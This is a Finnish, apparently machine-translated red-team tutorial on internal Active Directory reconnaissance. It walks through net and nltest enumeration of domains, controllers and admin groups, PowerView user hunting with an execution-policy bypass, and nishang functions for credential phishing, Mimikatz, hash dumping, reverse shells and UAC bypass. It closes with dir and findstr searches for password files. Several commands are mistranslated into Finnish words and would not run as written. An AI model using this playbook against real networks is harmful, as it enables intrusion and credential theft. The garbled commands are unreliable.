Teknologian jakaminen

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Perustietojen kerääminen toimialueen sisällä

2.NET komennot yksityiskohtaisen selityksen

3. Verkkotunnusten keruumenetelmät, joita käytetään pääasiassa intranetissä

4. Toimialueen ohjauskoneiden löytäminen

5. Kysy verkkotunnuksen käyttäjien perustiedot

6. Paikannustoimialueen hallinta

7. Powershell-komennot ja arkaluonteisten tietojen paikantaminen

---

---

---

---

---

---

1. Perustietojen kerääminen verkkotunnuksen sisällä:

Neljä tilannetta:

1. Paikallinen käyttäjä: käyttäjä

2. Paikallinen järjestelmänvalvojan käyttäjä: pois käytöstä kotiversiossa, käytettävissä vain palvelimessa

3. Verkkotunnuksen käyttäjät

4. Verkkotunnuksen järjestelmänvalvoja

Tavalliset paikalliset käyttäjät eivät voi saada verkkotunnuksen tietoja

Paikalliset järjestelmänvalvojat voivat siirtää oikeuksiaan suoraan järjestelmän käyttäjille (verkkotunnuksen käyttäjille) ja saada tietoja toimialueen sisällä.

1. Selvitä, onko verkkotunnus olemassa:

1. Tarkista toimialue: ipconfig/all tai systeminfo tai net config -työasema

ipconfig /all: Löytyi verkkotunnus: hack.com

systeminfo: Löytyi verkkotunnus: hack.com

2. Tarkastele verkkotunnuksen DNS-isäntä: nslookup domain name (hack.com)

3. Nettoaika/verkkoalue kolme tilannetta

Verkkotunnus on olemassa, mutta nykyinen käyttäjä ei ole verkkotunnuksen käyttäjä

Verkkotunnus on olemassa ja nykyinen käyttäjä on verkkotunnuksen käyttäjä

Nykyinen verkkoympäristö on työryhmä, eikä toimialuetta ole olemassa

2.NET-komennon tiedot:

1.net view: Näytä toimialueluettelo, tietokoneluettelo, määritetyt tietokoneen jaetut resurssit: verkkonäkymä (näytä tietokoneluettelo) verkkonäkymä \tietokone (näytä määritetty jaettu tietokone)

net view /domain:verkkotunnuksen nimi (hakkerointi) (näytä tietokoneluettelo)

2.net user näyttää paikallisia käyttäjiä: net user /domain näyttää kuinka monta käyttäjää toimialueella on

Lisää käyttäjä: verkkokäyttäjätunnus (admin) salasana (123)/lisää

3.net-käyttö: Liitä tietokone tai irrota tietokone jaetusta resurssista, näytä tietokoneen yhteystiedot

4.net time: Käytä aikaa tietokoneiden tai verkkotunnusten synkronointiin: nettoaika \tietokoneen verkkoaika /verkkotunnus

5.net start: Käynnistä palvelu tai näytä aloitettu palvelu: net start service

6.net tauko: Keskeytä käynnissä oleva palvelu: net pause -palvelu

7.net jatkaa: Aktivoi palvelu uudelleen: net jatka palvelua

8.net stop: Pysäytä Windows NT/2000/2003 -palvelu: net stop -palvelu

9.net share: poista, luo tai näytä jaettuja resursseja

10.net-istunto: Listaa tai katkaise yhteys paikallisen tietokoneen ja siihen yhdistettyjen asiakkaiden istunnot:

net-istunto //tietokone (tunnistaa luettelossa olevan tai istunnon sisältävän tietokoneen)

net-istunto //tietokoneen poistaminen (katkaise määritetyn tietokoneen istunto)

11.net localgroup Näytä tietokoneryhmä (koskee vain paikallista): net localgroup käyttäjätunnus

Verkkotunnuksen käyttäjä: net localgroup -käyttäjänimi/domain

12.net-ryhmä kysyy toimialueen ryhmän nimeä (koskee vain toimialueen ohjaimia): verkkoryhmä /verkkotunnus

13.net config näyttää parhaillaan käynnissä olevat konfiguroitavat palvelut tai näyttää ja muuttaa palvelun määrityksiä (paikallisesti):

net config (näyttää käynnissä olevat palvelut) net config services (näyttää luettelon palveluista)

14.net-tietokone Lisää tai poista tietokoneita verkkotunnuksen tietokannasta:

verkkotietokone \tietokoneen nimi /add tai /del (lisää tai poista tietokoneita kirjautumisalueelle)

3. Verkkotunnusten keruumenetelmät, joita käytetään pääasiassa intranetissä

Jos "Tämän työryhmän palvelinluettelo ei ole tällä hetkellä saatavilla" tulee näkyviin, ota käyttöön palvelut: Palvelin, WorkStation, tietokoneen selain ja sulje palomuuri.

Näytä verkkotunnus: ipconfig/all tai systeminfo tai net config -työasema

Tarkastele verkkotunnuksen DNS-isäntä: nslookup domain name (hack.com)

Kyselyverkkotunnus: verkkonäkymä /verkkotunnus

Tee kysely kaikista verkkotunnuksen tietokoneista: net view /domain:domain name

Pyydä luettelo kaikista verkkotunnuksen käyttäjäryhmistä: verkkoryhmä /verkkotunnus

Tee kysely kaikkien toimialueen jäsenten tietokoneluettelosta: verkkoryhmä "verkkoalueen tietokoneet" /verkkotunnus

Pyydä salasanatiedot verkkotunnuksessa: verkkotilit /verkkotunnus

Hanki verkkotunnuksen luottamustiedot: nltest /domain_trusts

4. Toimialueen ohjauskoneiden löytäminen

Näytä toimialueen ohjaimen nimi: nltest /DCLIST:hack

Katso koneen nimi, etsi IP, ping/nslookup: ping/nslookup toimialueen ohjaimen nimi

Joskus ping on poistettu käytöstä. Käytä nslookupia tässä.

Näytä toimialueen ohjaimen isäntänimi: nslookup ‐type=SRV _ldap._tcp

Tarkista nykyinen aika: verkkoaika / verkkotunnus

Tarkastele toimialueen ohjainryhmää: verkkoryhmä "Domain Controllers" /domain

5. Kysy verkkotunnuksen käyttäjien perustiedot

1. Kysele verkkotunnuksen käyttäjätietoja: verkkokäyttäjä /verkkotunnus

2. Tarkastele paikallisia käyttäjiä: wmic useraccount get name Domain users: wmic useraccount get domain,name

Paikallinen käyttäjä:

Verkkotunnuksen käyttäjä:

3. Tarkista olemassa olevat käyttäjät: dsquery user (joskus sitä ei ehkä suoriteta ja se voidaan suorittaa vain palvelinkoneessa)

4. Tee kysely paikallisen järjestelmänvalvojan käyttäjäryhmältä: net localgroup administrators

5. Kysely verkkotunnuksen järjestelmänvalvojan käyttäjille: verkkoryhmä "verkkotunnuksen järjestelmänvalvojat" /verkkotunnus

6. Tee kysely verkkotunnuksen järjestelmänvalvojan käyttäjäryhmältä: verkkoryhmä "Enterprise Admins" /domain

6. Paikannustoimialueen hallinta

Tässä tarvitaan kaksi työkalua

Lataa ensin työkalu palvelimelle ja suorita se sitten

1.PVEFindADUser: PVEFindADUser.exe -current (huomaa polku) Tämä työkalu voi tarkistaa, mitkä käyttäjät ovat kirjautuneet tietokoneeseen, jolloin voimme löytää verkkotunnuksen järjestelmänvalvojan

2.powerView-skripti:

powershell.exe ‐exec ohittaa ‐komento "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"

7. Powershell-komennot ja arkaluonteisten tietojen paikantaminen

Tarkista ensin käyttöoikeudet: Get-ExecutionPolicy

Muuta käynnissä olevaa käytäntöä: Set-ExecutionPolicy Unrestricted (vain Rajoittamattomat käyttöoikeudet voivat suorittaa pow:n)

nishang-työkalu (edellisessä artikkelissa on latauslinkki):

Kun olet sijoittanut sen CS-hakemistoon, tuo se suoraan: powershell-import nishang/nishang.psm1

Suorita: powershell-komento

Joitakin yleisesti käytettyjä komentoja:

Check-VM: Tarkista, onko isäntä virtuaalikone

Invoke-CredentialsPhish: Huijaa käyttäjä syöttämään salasanansa

Get-WLAN-Keys: wifi-tiedot

Invoke-Mimikatz: Catch salasanat

Get-PassHashes: Hanki hash

Get-PassHints: Hanki käyttäjän salasanavihjetiedot

Invoke-PowerShellTcp: Rebound-kuori

Invoke-PsUACme: Ohita UAC

Poista-päivitys: Poista korjaustiedosto

Hanki tietoa: paikallista tietoa

Esimerkki: powershell Check-VM

Arkaluonteisten tietojen paikantaminen:

1. Kerää erilaisia ​​arkaluonteisia tiedostoja määrättyihin hakemistoihin

hakemisto /a /s /bd:"*.txt"

hakemisto /a /s /b C:"*.xlsx"

hakemisto /a /s /bd:"*.md"

hakemisto /a /s /bd:"*.sql"

hakemisto /a /s /bd:"*.pdf"

hakemisto /a /s /bd:"*.docx"

dir /a /s /bd:"*.doc"

dir /a /s /bd:"*conf*"

dir /a /s /bd:"*bak*"

dir /a /s /bd:"*pwd*"

dir /a /s /bd:"*pass*"

dir /a /s /bd:"*kirjautuminen*"

hakemisto /a /s /bd:"*käyttäjä*"

2. Kerää eri tilin salasanoja määritetyn hakemiston tiedostoista

findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

Esimerkki: dir /a /s /bd:"*.txt"